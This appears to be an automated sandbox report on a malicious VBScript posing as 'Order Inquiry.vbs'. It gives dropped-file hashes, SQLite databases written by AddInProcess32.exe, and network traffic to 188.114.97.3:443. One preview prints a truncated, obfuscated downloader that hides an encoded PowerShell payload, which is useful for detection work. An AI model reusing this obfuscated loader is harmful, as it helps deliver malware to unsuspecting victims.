          Category:dropped
          Size (bytes):13771
          Entropy (8bit):4.688734205600574
          Encrypted:false
          SSDEEP:384:btmLndV4uQ1Qxfl4YpSd+mMMG9G03XVB8H+4yRylVpPgRHVHzvsRnZZ+kOi:iVPkQfllSg3MGs03XVBTLWVgHSCkn
          MD5:06087157AEEB6BC457DC48D172E436A2
          SHA1:A44A440729975DAA0A720692E49797E127E8B0D5
          SHA-256:B463AF4A4D68590AD381817E1FDD554A2F6194A804889107B0007F739C471E2A
          SHA-512:70873E44939258ED456BE90FD57383AE2B82F8A735061F2922B7E304F6A644A0A8F16B2C474BEB0CCAAD037EE1270358D93D957B21EB2DBD589B890D95458C32
          Malicious:false
          Preview:.. dim posteridade , subface , berlinense , malhorquino , dionina , Cama , dionina1.. subface = " ".. berlinense = "" & malhorquino & subface & malhorquino & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & malhorquino & subface & malhorquino & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & malhorquino & subface & malhorquino & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & malhorquino & subface & malhorquino & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & malhorquino & subface & malhorquino & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & malhorquino & subface & malhorquino & "QBuDgTreHQDgTreOwDgTregDg
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:NlllulN7rlz:NllU
          MD5:60800FE3EBA2CA09118A33A34BF00BD8
          SHA1:4DBA1472443F1B047803693393F61A2182695D2A
          SHA-256:D85FCEE5CD239F2EE739F27980E9EBB1BE0573405BC7C004DB4E828D1A2D50A0
          SHA-512:AFD4B6861BD4A06C23FEC68375FD4B012E8A456ED8EEF708B3F50C6FCD40D7B599B9967EDCFF9E917F9B8BF567ED2B6C5B7EE83AA2F6965A6D02BB1DABB9010F
          Malicious:false
          Preview:@...e................................................@..........
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):229376
          Entropy (8bit):0.6434294034339584
          Encrypted:false
          SSDEEP:384:A1zkVmvQhyn+Zoz67wNlvMM4333JCN87/LKX15kuv:AhjMmCqR
          MD5:515AEBFD1A85F4A59C3009D04D95D765
          SHA1:67593344CBEF68DB6F90AD02E4FB658036455FAF
          SHA-256:8FD38413C29B8801CF5C5C13027786907F4D3D2F03CB5ADC25BF43B860D13DF0
          SHA-512:CAFB98EB2573E6898DC00F23B683F576C6852EEB99C135FBF27045932E0DBBF749159EA13876718CAEA7C06960762CEADCF2307F66DFA7CB9A88AB1EA2E1CE8B
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):294912
          Entropy (8bit):0.08432026317203951
          Encrypted:false
          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vD:51zkVmvQhyn+Zoz67+
          MD5:C444D5B9503F9CCFA9750AB3D51848E9
          SHA1:FFF755261E04C7502AF2F172DE3752D9458100FE
          SHA-256:66EA7282C9A15E75F5F52CB5D745FD1B4830045EB70D99AB4F07744A67E0879E
          SHA-512:E22CC4F41EC10146718E2767B68DCB20CF02AEC55DA8686988A16350045D6A31B9CDF16B7329EE436E9DBF1795699809819FEC2E7D9D460B046FAEC65BC48334
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):98304
          Entropy (8bit):0.08235737944063153
          Encrypted:false
          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):0.8553638852307782
          Encrypted:false
          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
          MD5:28222628A3465C5F0D4B28F70F97F482
          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.8475592208333753
          Encrypted:false
          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
          MD5:BE99679A2B018331EACD3A1B680E3757
          SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
          SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
          SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):106496
          Entropy (8bit):1.1373607036346451
          Encrypted:false
          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
          MD5:64BCCF32ED2142E76D142DF7AAC75730
          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
          Malicious:false
          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):159744
          Entropy (8bit):0.5394293526345721
          Encrypted:false
          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
          MD5:52701A76A821CDDBC23FB25C3FCA4968
          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
          Malicious:false
          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):159744
          Entropy (8bit):0.5394293526345721
          Encrypted:false
          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
          MD5:52701A76A821CDDBC23FB25C3FCA4968
          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
          Malicious:false
          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.37202887060507356
          Encrypted:false
          SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
          MD5:4D950F6445B3766514BA266D6B1F3325
          SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
          SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
          SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):106496
          Entropy (8bit):1.1373607036346451
          Encrypted:false
          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
          MD5:64BCCF32ED2142E76D142DF7AAC75730
          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
          Malicious:false
          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):51200
          Entropy (8bit):0.8746135976761988
          Encrypted:false
          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
          MD5:9E68EA772705B5EC0C83C2A97BB26324
          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):5242880
          Entropy (8bit):0.03708713717387235
          Encrypted:false
          SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
          MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
          SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
          SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
          SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
          Malicious:false
          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.6732424250451717
          Encrypted:false
          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):196608
          Entropy (8bit):1.1209886597424439
          Encrypted:false
          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
          Malicious:false
          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):155648
          Entropy (8bit):0.5407252242845243
          Encrypted:false
          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
          MD5:7B955D976803304F2C0505431A0CF1CF
          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
          Malicious:false
          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):155648
          Entropy (8bit):0.5407252242845243
          Encrypted:false
          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
          MD5:7B955D976803304F2C0505431A0CF1CF
          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
          Malicious:false
          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.3528485475628876
          Encrypted:false
          SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
          MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
          SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
          SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
          SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):196608
          Entropy (8bit):1.1209886597424439
          Encrypted:false
          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
          Malicious:false
          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Entropy (8bit):3.39871661864384
          TrID:
          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
          • MP3 audio (1001/1) 32.22%
          • Lumena CEL bitmap (63/63) 2.03%
          • Corel Photo Paint (41/41) 1.32%
          File name:Order Inquiry.vbs
          File size:240'822 bytes
          MD5:443f85c9a27129786164968923b47193
          SHA1:a45f63374b28561a0152e261bd57e5a2bb9c54f9
          SHA256:f3ff35c81d1f64fe7a0f1fb55e1c732d091b8faedc4fcd35eef9d0afe5455a63
          SHA512:3ef8963f3745ba562da95d7263550d291a86aaefb952373d165972e7d8aea91cf051aaab5949b8d9605897cd6b049674576d9a50453423beba9061f503288eb2
          SSDEEP:3072:nBaHznXmxLLCg5Hmgw/kYFvhte41TdRnTTcQYT2X5K0ybU:Xw/kYFJ5Ky
          TLSH:7834C35263EA4008F2F73F54A9BA55214B3BBDD9AD79CA4D418C296D0BE3940CCB1B73
          File Content Preview:..P.r.i.v.a.t.e. .S.u.b. .S.e.t.D.n.s.P.u.b.l.i.s.h.i.n.g.D.i.s.a.b.l.e.d.(.b.o.o.l.)..... . . . .D.i.m. .o.b.j.S.e.r.v.i.c.e.,. .o.b.j.P.r.o.d.u.c.t..... . . . .D.i.m. .k.m.s.F.l.a.g.,. .l.R.e.t.,. .d.w.V.a.l.u.e......... . . . .O.n. .E.r.r.o.r. .R.e.s.u
          Icon Hash:68d69b8f86ab9a86
          TimestampSource PortDest PortSource IPDest IP
          Jun 14, 2024 15:15:00.293201923 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:00.293231964 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:00.293332100 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:00.386943102 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:00.386977911 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:00.993308067 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:00.993397951 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.066081047 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.066135883 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.066443920 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.066509962 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.068896055 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.116504908 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352607012 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352648020 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352694035 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.352709055 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352720022 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352741003 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.352762938 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352763891 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.352772951 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352806091 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.380480051 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.380582094 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.380605936 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.380655050 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.468863010 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.468918085 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.468925953 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.468945980 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.468957901 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.469001055 CEST49706443192.168.2.8188.114.97.3
